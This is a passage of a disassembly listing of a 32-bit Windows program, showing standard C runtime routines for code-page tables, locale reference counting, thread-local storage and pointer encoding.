		jnz	short loc_40506D
		mov	eax, [ebp+var_10]
		mov	eax, [eax+4]
		mov	dword_428124, 1
		jmp	short loc_405031
; ---------------------------------------------------------------------------

loc_40506D:				; CODE XREF: sub_405004+55j
		cmp	[ebp+var_4], bl
		jz	short loc_405079
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_405079:				; CODE XREF: sub_405004+6Cj
		mov	eax, esi

loc_40507B:				; CODE XREF: sub_405004+30j
					; sub_405004+39j
		pop	ebx
		leave
		retn
sub_405004	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40507E	proc near		; CODE XREF: sub_405229+5Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		call	sub_405004
		mov	edi, eax
		xor	esi, esi
		cmp	edi, esi
		mov	[ebp+arg_0], edi
		jnz	short loc_4050B5

loc_4050A7:				; CODE XREF: sub_40507E+193j
		mov	eax, ebx
		call	sub_404D81

loc_4050AE:				; CODE XREF: sub_40507E+146j
		xor	eax, eax
		jmp	loc_40521A
; ---------------------------------------------------------------------------

loc_4050B5:				; CODE XREF: sub_40507E+27j
		mov	[ebp+var_1C], esi
		xor	eax, eax

loc_4050BA:				; CODE XREF: sub_40507E+4Fj
		cmp	dword_4244A0[eax], edi
		jz	short loc_405129
		inc	[ebp+var_1C]
		add	eax, 30h
		cmp	eax, 0F0h
		jb	short loc_4050BA
		lea	eax, [ebp+var_18]
		push	eax
		push	edi
		call	ds:dword_41E1B4	; GetCPInfo
		test	eax, eax
		jz	loc_40520B
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_408130
		xor	edx, edx
		inc	edx
		add	esp, 0Ch
		cmp	[ebp+var_18], edx
		mov	[ebx+4], edi
		mov	[ebx+0Ch], esi
		jbe	loc_4051FE
		cmp	[ebp+var_12], 0
		jz	loc_4051DF
		lea	esi, [ebp+var_11]

loc_405113:				; CODE XREF: sub_40507E+15Bj
		mov	cl, [esi]
		test	cl, cl
		jz	loc_4051DF
		movzx	eax, byte ptr [esi-1]
		movzx	ecx, cl
		jmp	loc_4051CF
; ---------------------------------------------------------------------------

loc_405129:				; CODE XREF: sub_40507E+42j
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_408130
		mov	ecx, [ebp+var_1C]
		add	esp, 0Ch
		imul	ecx, 30h
		mov	[ebp+var_20], esi
		lea	esi, dword_4244B0[ecx]
		mov	[ebp+var_1C], esi
		jmp	short loc_405179
; ---------------------------------------------------------------------------

loc_40514F:				; CODE XREF: sub_40507E+FEj
		mov	al, [esi+1]
		test	al, al
		jz	short loc_40517E
		movzx	edi, byte ptr [esi]
		movzx	eax, al
		jmp	short loc_405170
; ---------------------------------------------------------------------------

loc_40515E:				; CODE XREF: sub_40507E+F4j
		mov	eax, [ebp+var_20]
		mov	al, byte_42449C[eax]
		or	[ebx+edi+1Dh], al
		movzx	eax, byte ptr [esi+1]
		inc	edi

loc_405170:				; CODE XREF: sub_40507E+DEj
		cmp	edi, eax
		jbe	short loc_40515E
		mov	edi, [ebp+arg_0]
		inc	esi
		inc	esi

loc_405179:				; CODE XREF: sub_40507E+CFj
					; sub_40507E+110j
		cmp	byte ptr [esi],	0
		jnz	short loc_40514F

loc_40517E:				; CODE XREF: sub_40507E+D6j
		mov	esi, [ebp+var_1C]
		inc	[ebp+var_20]
		add	esi, 8
		cmp	[ebp+var_20], 4
		mov	[ebp+var_1C], esi
		jb	short loc_405179
		mov	eax, edi
		mov	[ebx+4], edi
		mov	dword ptr [ebx+8], 1
		call	sub_404D52
		push	6
		mov	[ebx+0Ch], eax
		lea	eax, [ebx+10h]
		lea	ecx, dword_4244A4[ecx]
		pop	edx

loc_4051B0:				; CODE XREF: sub_40507E+13Dj
		mov	si, [ecx]
		inc	ecx
		mov	[eax], si
		inc	ecx
		inc	eax
		inc	eax
		dec	edx
		jnz	short loc_4051B0

loc_4051BD:				; CODE XREF: sub_40507E+18Bj
		mov	esi, ebx
		call	sub_404DD6
		jmp	loc_4050AE
; ---------------------------------------------------------------------------

loc_4051C9:				; CODE XREF: sub_40507E+153j
		or	byte ptr [ebx+eax+1Dh],	4
		inc	eax

loc_4051CF:				; CODE XREF: sub_40507E+A6j
		cmp	eax, ecx
		jbe	short loc_4051C9
		inc	esi
		inc	esi
		cmp	byte ptr [esi-1], 0
		jnz	loc_405113

loc_4051DF:				; CODE XREF: sub_40507E+8Cj
					; sub_40507E+99j
		lea	eax, [ebx+1Eh]
		mov	ecx, 0FEh

loc_4051E7:				; CODE XREF: sub_40507E+16Ej
		or	byte ptr [eax],	8
		inc	eax
		dec	ecx
		jnz	short loc_4051E7
		mov	eax, [ebx+4]
		call	sub_404D52
		mov	[ebx+0Ch], eax
		mov	[ebx+8], edx
		jmp	short loc_405201
; ---------------------------------------------------------------------------

loc_4051FE:				; CODE XREF: sub_40507E+82j
		mov	[ebx+8], esi

loc_405201:				; CODE XREF: sub_40507E+17Ej
		xor	eax, eax
		lea	edi, [ebx+10h]
		stosd
		stosd
		stosd
		jmp	short loc_4051BD
; ---------------------------------------------------------------------------

loc_40520B:				; CODE XREF: sub_40507E+5Ej
		cmp	dword_428124, esi
		jnz	loc_4050A7
		or	eax, 0FFFFFFFFh

loc_40521A:				; CODE XREF: sub_40507E+32j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_40507E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405229	proc near		; CODE XREF: sub_4053C3+Bp

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00405395 SIZE 0000002E BYTES

		push	14h
		push	offset dword_4229C0
		call	__SEH_prolog4
		or	[ebp+var_20], 0FFFFFFFFh
		call	sub_40595D
		mov	edi, eax
		mov	[ebp+var_24], edi
		call	sub_404F60
		mov	ebx, [edi+68h]
		mov	esi, [ebp+arg_0]
		call	sub_405004
		mov	[ebp+arg_0], eax
		cmp	eax, [ebx+4]
		jz	loc_4053B6
		push	220h
		call	sub_407CFA
		pop	ecx
		mov	ebx, eax
		test	ebx, ebx
		jz	loc_4053BA
		mov	ecx, 88h
		mov	esi, [edi+68h]
		mov	edi, ebx
		rep movsd
		and	dword ptr [ebx], 0
		push	ebx
		push	[ebp+arg_0]
		call	sub_40507E
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jnz	loc_405395
		mov	esi, [ebp+var_24]
		push	dword ptr [esi+68h]
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_4052BA
		mov	eax, [esi+68h]
		cmp	eax, offset dword_424070
		jz	short loc_4052BA
		push	eax
		call	sub_403B91
		pop	ecx

loc_4052BA:				; CODE XREF: sub_405229+7Ej
					; sub_405229+88j
		mov	[esi+68h], ebx
		push	ebx
		mov	edi, ds:dword_41E1B8
		call	edi	; InterlockedIncrement
		test	byte ptr [esi+70h], 2
		jnz	loc_4053BA
		test	byte ptr dword_424594, 1
		jnz	loc_4053BA
		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebx+4]
		mov	dword_428134, eax
		mov	eax, [ebx+8]
		mov	dword_428138, eax
		mov	eax, [ebx+0Ch]
		mov	dword_42813C, eax
		xor	eax, eax

loc_405303:				; CODE XREF: sub_405229+F0j
		mov	[ebp+var_1C], eax
		cmp	eax, 5
		jge	short loc_40531B
		mov	cx, [ebx+eax*2+10h]
		mov	word_428128[eax*2], cx
		inc	eax
		jmp	short loc_405303
; ---------------------------------------------------------------------------

loc_40531B:				; CODE XREF: sub_405229+E0j
		xor	eax, eax

loc_40531D:				; CODE XREF: sub_405229+109j
		mov	[ebp+var_1C], eax
		cmp	eax, 101h
		jge	short loc_405334
		mov	cl, [eax+ebx+1Ch]
		mov	byte_424290[eax], cl
		inc	eax
		jmp	short loc_40531D
; ---------------------------------------------------------------------------

loc_405334:				; CODE XREF: sub_405229+FCj
		xor	eax, eax

loc_405336:				; CODE XREF: sub_405229+125j
		mov	[ebp+var_1C], eax
		cmp	eax, 100h
		jge	short loc_405350
		mov	cl, [eax+ebx+11Dh]
		mov	byte_424398[eax], cl
		inc	eax
		jmp	short loc_405336
; ---------------------------------------------------------------------------

loc_405350:				; CODE XREF: sub_405229+115j
		push	dword_424498
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_405373
		mov	eax, dword_424498
		cmp	eax, offset dword_424070
		jz	short loc_405373
		push	eax
		call	sub_403B91
		pop	ecx

loc_405373:				; CODE XREF: sub_405229+135j
					; sub_405229+141j
		mov	dword_424498, ebx
		push	ebx
		call	edi	; InterlockedIncrement
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40538A
		jmp	short loc_4053BA
sub_405229	endp


; =============== S U B	R O U T	I N E =======================================



sub_40538A	proc near		; CODE XREF: sub_405229+15Ap
					; DATA XREF: jlrllt49:004229D8o
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_40538A	endp

; ---------------------------------------------------------------------------
		jmp	short loc_4053BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_405229

loc_405395:				; CODE XREF: sub_405229+6Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4053BA
		cmp	ebx, offset dword_424070
		jz	short loc_4053A9
		push	ebx
		call	sub_403B91
		pop	ecx

loc_4053A9:				; CODE XREF: sub_405229+177j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		jmp	short loc_4053BA
; ---------------------------------------------------------------------------

loc_4053B6:				; CODE XREF: sub_405229+30j
		and	[ebp+var_20], 0

loc_4053BA:				; CODE XREF: sub_405229+45j
					; sub_405229+A1j ...
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_405229

; =============== S U B	R O U T	I N E =======================================



sub_4053C3	proc near		; CODE XREF: sub_40B144+Cp
					; sub_40B1A1+Dp ...
		cmp	dword_438834, 0
		jnz	short loc_4053DE
		push	0FFFFFFFDh
		call	sub_405229
		pop	ecx
		mov	dword_438834, 1

loc_4053DE:				; CODE XREF: sub_4053C3+7j
		xor	eax, eax
		retn
sub_4053C3	endp


; =============== S U B	R O U T	I N E =======================================



sub_4053E1	proc near		; CODE XREF: sub_405633+31p
					; sub_405975+E8p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		mov	eax, [esi+0BCh]
		xor	ebp, ebp
		cmp	eax, ebp
		push	edi
		jz	short loc_405464
		cmp	eax, offset off_424F38
		jz	short loc_405464
		mov	eax, [esi+0B0h]
		cmp	eax, ebp
		jz	short loc_405464
		cmp	[eax], ebp
		jnz	short loc_405464
		mov	eax, [esi+0B8h]
		cmp	eax, ebp
		jz	short loc_40542B
		cmp	[eax], ebp
		jnz	short loc_40542B
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_40CCC4
		pop	ecx
		pop	ecx

loc_40542B:				; CODE XREF: sub_4053E1+31j
					; sub_4053E1+35j
		mov	eax, [esi+0B4h]
		cmp	eax, ebp
		jz	short loc_40544C
		cmp	[eax], ebp
		jnz	short loc_40544C
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_40CC84
		pop	ecx
		pop	ecx

loc_40544C:				; CODE XREF: sub_4053E1+52j
					; sub_4053E1+56j
		push	dword ptr [esi+0B0h]
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_403B91
		pop	ecx
		pop	ecx

loc_405464:				; CODE XREF: sub_4053E1+12j
					; sub_4053E1+19j ...
		mov	eax, [esi+0C0h]
		cmp	eax, ebp
		jz	short loc_4054B2
		cmp	[eax], ebp
		jnz	short loc_4054B2
		mov	eax, [esi+0C4h]
		sub	eax, 0FEh
		push	eax
		call	sub_403B91
		mov	eax, [esi+0CCh]
		mov	edi, 80h
		sub	eax, edi
		push	eax
		call	sub_403B91
		mov	eax, [esi+0D0h]
		sub	eax, edi
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0C0h]
		call	sub_403B91
		add	esp, 10h

loc_4054B2:				; CODE XREF: sub_4053E1+8Bj
					; sub_4053E1+8Fj
		lea	edi, [esi+0D4h]
		mov	eax, [edi]
		cmp	eax, offset off_424E78
		jz	short loc_4054D8
		cmp	[eax+0B4h], ebp
		jnz	short loc_4054D8
		push	eax
		call	sub_40CAF4
		push	dword ptr [edi]
		call	sub_403B91
		pop	ecx
		pop	ecx

loc_4054D8:				; CODE XREF: sub_4053E1+DEj
					; sub_4053E1+E6j
		push	6
		lea	edi, [esi+50h]
		pop	ebx

loc_4054DE:				; CODE XREF: sub_4053E1+132j
		cmp	dword ptr [edi-8], offset dword_424598
		jz	short loc_4054F8
		mov	eax, [edi]
		cmp	eax, ebp
		jz	short loc_4054F8
		cmp	[eax], ebp
		jnz	short loc_4054F8
		push	eax
		call	sub_403B91
		pop	ecx

loc_4054F8:				; CODE XREF: sub_4053E1+104j
					; sub_4053E1+10Aj ...
		cmp	[edi-4], ebp
		jz	short loc_40550F
		mov	eax, [edi+4]
		cmp	eax, ebp
		jz	short loc_40550F
		cmp	[eax], ebp
		jnz	short loc_40550F
		push	eax
		call	sub_403B91
		pop	ecx

loc_40550F:				; CODE XREF: sub_4053E1+11Aj
					; sub_4053E1+121j ...
		add	edi, 10h
		dec	ebx
		jnz	short loc_4054DE
		push	esi
		call	sub_403B91
		pop	ecx
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_4053E1	endp


; =============== S U B	R O U T	I N E =======================================



sub_405521	proc near		; CODE XREF: sub_405633+12p
					; sub_405826+93p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		push	edi
		mov	edi, ds:dword_41E1B8
		push	esi
		call	edi	; InterlockedIncrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_40553F
		push	eax
		call	edi	; InterlockedIncrement

loc_40553F:				; CODE XREF: sub_405521+19j
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_40554C
		push	eax
		call	edi	; InterlockedIncrement

loc_40554C:				; CODE XREF: sub_405521+26j
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_405559
		push	eax
		call	edi	; InterlockedIncrement

loc_405559:				; CODE XREF: sub_405521+33j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_405566
		push	eax
		call	edi	; InterlockedIncrement

loc_405566:				; CODE XREF: sub_405521+40j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_40556C:				; CODE XREF: sub_405521+71j
		cmp	dword ptr [ebx-8], offset dword_424598
		jz	short loc_40557E
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_40557E
		push	eax
		call	edi	; InterlockedIncrement

loc_40557E:				; CODE XREF: sub_405521+52j
					; sub_405521+58j
		cmp	dword ptr [ebx-4], 0
		jz	short loc_40558E
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_40558E
		push	eax
		call	edi	; InterlockedIncrement

loc_40558E:				; CODE XREF: sub_405521+61j
					; sub_405521+68j
		add	ebx, 10h
		dec	ebp
		jnz	short loc_40556C
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedIncrement
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_405521	endp


; =============== S U B	R O U T	I N E =======================================



sub_4055A7	proc near		; CODE XREF: sub_405633+1Dp
					; sub_405975+CCp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40562F
		push	ebx
		push	ebp
		push	edi
		mov	edi, ds:dword_41E18C
		push	esi
		call	edi	; InterlockedDecrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_4055C9
		push	eax
		call	edi	; InterlockedDecrement

loc_4055C9:				; CODE XREF: sub_4055A7+1Dj
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_4055D6
		push	eax
		call	edi	; InterlockedDecrement

loc_4055D6:				; CODE XREF: sub_4055A7+2Aj
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_4055E3
		push	eax
		call	edi	; InterlockedDecrement

loc_4055E3:				; CODE XREF: sub_4055A7+37j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_4055F0
		push	eax
		call	edi	; InterlockedDecrement

loc_4055F0:				; CODE XREF: sub_4055A7+44j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_4055F6:				; CODE XREF: sub_4055A7+75j
		cmp	dword ptr [ebx-8], offset dword_424598
		jz	short loc_405608
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_405608
		push	eax
		call	edi	; InterlockedDecrement

loc_405608:				; CODE XREF: sub_4055A7+56j
					; sub_4055A7+5Cj
		cmp	dword ptr [ebx-4], 0
		jz	short loc_405618
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_405618
		push	eax
		call	edi	; InterlockedDecrement

loc_405618:				; CODE XREF: sub_4055A7+65j
					; sub_4055A7+6Cj
		add	ebx, 10h
		dec	ebp
		jnz	short loc_4055F6
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedDecrement
		pop	edi
		pop	ebp
		pop	ebx

loc_40562F:				; CODE XREF: sub_4055A7+7j
		mov	eax, esi
		pop	esi
		retn
sub_4055A7	endp


; =============== S U B	R O U T	I N E =======================================



sub_405633	proc near		; CODE XREF: sub_405671+54p
		test	edi, edi
		jz	short loc_40566E
		test	eax, eax
		jz	short loc_40566E
		push	esi
		mov	esi, [eax]
		cmp	esi, edi
		jz	short loc_40566A
		push	edi
		mov	[eax], edi
		call	sub_405521
		test	esi, esi
		pop	ecx
		jz	short loc_40566A
		push	esi
		call	sub_4055A7
		cmp	dword ptr [esi], 0
		pop	ecx
		jnz	short loc_40566A
		cmp	esi, offset dword_4245A0
		jz	short loc_40566A
		push	esi
		call	sub_4053E1
		pop	ecx

loc_40566A:				; CODE XREF: sub_405633+Dj
					; sub_405633+1Aj ...
		mov	eax, edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40566E:				; CODE XREF: sub_405633+2j
					; sub_405633+6j
		xor	eax, eax
		retn
sub_405633	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405671	proc near		; CODE XREF: sub_402CAD+37p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_4229E0
		call	__SEH_prolog4
		call	sub_40595D
		mov	esi, eax
		mov	eax, dword_424594
		test	[esi+70h], eax
		jz	short loc_4056B0
		cmp	dword ptr [esi+6Ch], 0
		jz	short loc_4056B0
		call	sub_40595D
		mov	esi, [eax+6Ch]

loc_40569C:				; CODE XREF: sub_405671+68j
		test	esi, esi
		jnz	short loc_4056A8
		push	20h
		call	sub_407E1D
		pop	ecx

loc_4056A8:				; CODE XREF: sub_405671+2Dj
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4056B0:				; CODE XREF: sub_405671+1Bj
					; sub_405671+21j
		push	0Ch
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		lea	eax, [esi+6Ch]
		mov	edi, off_424678
		call	sub_405633
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4056DB
		jmp	short loc_40569C
sub_405671	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056DB	proc near		; CODE XREF: sub_405671+63p
					; DATA XREF: jlrllt49:004229F8o
		push	0Ch
		call	sub_405EDF
		pop	ecx
		mov	esi, [ebp-1Ch]
		retn
sub_4056DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056E7	proc near		; CODE XREF: sub_403297+81p
					; sub_403297+96p ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42468C
		mov	esi, ds:dword_41E180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_40571B
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40571B
		push	eax
		push	dword_42468C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_40571B
		mov	eax, [eax+1F8h]
		jmp	short loc_405736
; ---------------------------------------------------------------------------

loc_40571B:				; CODE XREF: sub_4056E7+11j
					; sub_4056E7+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_405744
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		call	ds:off_41E0E8

loc_405736:				; CODE XREF: sub_4056E7+32j
		test	eax, eax
		jz	short loc_405744
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_405744:				; CODE XREF: sub_4056E7+41j
					; sub_4056E7+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_4056E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40574A	proc near		; CODE XREF: sub_4080D9+1p
					; sub_40BED5+2Fp ...
		push	0
		call	sub_4056E7
		pop	ecx
		retn
sub_40574A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405753	proc near		; CODE XREF: sub_403297+Bp
					; sub_403297+1Cp ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42468C
		mov	esi, ds:dword_41E180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_405787
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405787
		push	eax
		push	dword_42468C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_405787
		mov	eax, [eax+1FCh]
		jmp	short loc_4057A2
; ---------------------------------------------------------------------------

loc_405787:				; CODE XREF: sub_405753+11j
					; sub_405753+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4057B0
		push	offset aDecodepointer ;	"DecodePointer"
		push	eax
		call	ds:off_41E0E8

loc_4057A2:				; CODE XREF: sub_405753+32j
		test	eax, eax
		jz	short loc_4057B0
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_4057B0:				; CODE XREF: sub_405753+41j
					; sub_405753+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_405753	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057B6	proc near		; DATA XREF: sub_405A96+8Ao
					; .data:off_428164o
		call	ds:dword_41E17C	; TlsAlloc
		retn	4
sub_4057B6	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057BF	proc near		; CODE XREF: sub_4058DA+Ap
		push	dword_42468C
		call	ds:dword_41E180	; TlsGetValue
		test	eax, eax
		jnz	short locret_4057E8
		push	off_428168
		call	sub_405753
		pop	ecx
		push	eax
		push	dword_42468C
		call	ds:dword_41E178	; TlsSetValue

locret_4057E8:				; CODE XREF: sub_4057BF+Ej
		retn
sub_4057BF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057E9	proc near		; CODE XREF: sub_405A96+12p
					; sub_405A96:loc_405C10p
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405809
		push	eax
		push	off_428170
		call	sub_405753
		pop	ecx
		call	eax
		or	dword_424688, 0FFFFFFFFh

loc_405809:				; CODE XREF: sub_4057E9+8j
		mov	eax, dword_42468C
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405821
		push	eax
		call	ds:off_41E174
		or	dword_42468C, 0FFFFFFFFh

loc_405821:				; CODE XREF: sub_4057E9+28j
		jmp	sub_405E8A
sub_4057E9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405826	proc near		; CODE XREF: sub_4058DA+59p
					; sub_405A96+162p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	0Ch
		push	offset dword_422A00
		call	__SEH_prolog4
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		mov	[ebp+var_1C], eax
		mov	esi, [ebp+arg_0]
		mov	dword ptr [esi+5Ch], offset dword_424DC0
		xor	edi, edi
		inc	edi
		mov	[esi+14h], edi
		test	eax, eax
		jz	short loc_405878
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		mov	ebx, ds:off_41E0E8
		call	ebx ; sub_457FDC
		mov	[esi+1F8h], eax
		push	offset aDecodepointer ;	"DecodePointer"
		push	[ebp+var_1C]
		call	ebx ; sub_457FDC
		mov	[esi+1FCh], eax

loc_405878:				; CODE XREF: sub_405826+2Cj
		mov	[esi+70h], edi
		mov	byte ptr [esi+0C8h], 43h
		mov	byte ptr [esi+14Bh], 43h
		mov	eax, offset dword_424070
		mov	[esi+68h], eax
		push	eax
		call	ds:dword_41E1B8	; InterlockedIncrement
		push	0Ch
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebp+arg_4]
		mov	[esi+6Ch], eax
		test	eax, eax
		jnz	short loc_4058B6
		mov	eax, off_424678
		mov	[esi+6Ch], eax

loc_4058B6:				; CODE XREF: sub_405826+86j
		push	dword ptr [esi+6Ch]
		call	sub_405521
		pop	ecx
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4058D1
		call	__SEH_epilog4
		retn
sub_405826	endp


; =============== S U B	R O U T	I N E =======================================



sub_4058D1	proc near		; CODE XREF: sub_405826+A0p
					; DATA XREF: jlrllt49:00422A18o
		push	0Ch
		call	sub_405EDF
		pop	ecx
		retn
sub_4058D1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4058DA	proc near		; CODE XREF: sub_40595D+1p sub_405D93p ...
		push	esi
		push	edi
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	edi, eax
		call	sub_4057BF
		push	dword_424688
		push	dword_42468C
		call	ds:dword_41E180	; TlsGetValue
		call	eax
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405951
		push	214h
		push	1
		call	sub_407D3A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405951
		push	esi
		push	dword_424688
		push	off_42816C
		call	sub_405753
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_405948
		push	0
		push	esi
		call	sub_405826
		pop	ecx
		pop	ecx
		call	ds:dword_41E0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		jmp	short loc_405951
; ---------------------------------------------------------------------------

loc_405948:				; CODE XREF: sub_4058DA+54j
		push	esi
		call	sub_403B91
		pop	ecx
		xor	esi, esi

loc_405951:				; CODE XREF: sub_4058DA+27j
					; sub_4058DA+3Bj ...
		push	edi
		call	ds:dword_41E170	; RtlRestoreLastWin32Error
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_4058DA	endp


; =============== S U B	R O U T	I N E =======================================



sub_40595D	proc near		; CODE XREF: sub_402CAD+Fp sub_4038E4p ...
		push	esi
		call	sub_4058DA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405971
		push	10h
		call	sub_407E1D
		pop	ecx

loc_405971:				; CODE XREF: sub_40595D+Aj
		mov	eax, esi
		pop	esi
		retn
sub_40595D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405975	proc near		; DATA XREF: sub_405A96+115o

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422A20
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	loc_405A76
		mov	eax, [esi+24h]
		test	eax, eax
		jz	short loc_40599A
		push	eax
		call	sub_403B91
		pop	ecx

loc_40599A:				; CODE XREF: sub_405975+1Cj
		mov	eax, [esi+2Ch]
		test	eax, eax
		jz	short loc_4059A8
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059A8:				; CODE XREF: sub_405975+2Aj
		mov	eax, [esi+34h]
		test	eax, eax
		jz	short loc_4059B6
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059B6:				; CODE XREF: sub_405975+38j
		mov	eax, [esi+3Ch]
		test	eax, eax
		jz	short loc_4059C4
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059C4:				; CODE XREF: sub_405975+46j
		mov	eax, [esi+44h]
		test	eax, eax
		jz	short loc_4059D2
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059D2:				; CODE XREF: sub_405975+54j
		mov	eax, [esi+48h]
		test	eax, eax
		jz	short loc_4059E0
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059E0:				; CODE XREF: sub_405975+62j
		mov	eax, [esi+5Ch]
		cmp	eax, offset dword_424DC0
		jz	short loc_4059F1
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059F1:				; CODE XREF: sub_405975+73j
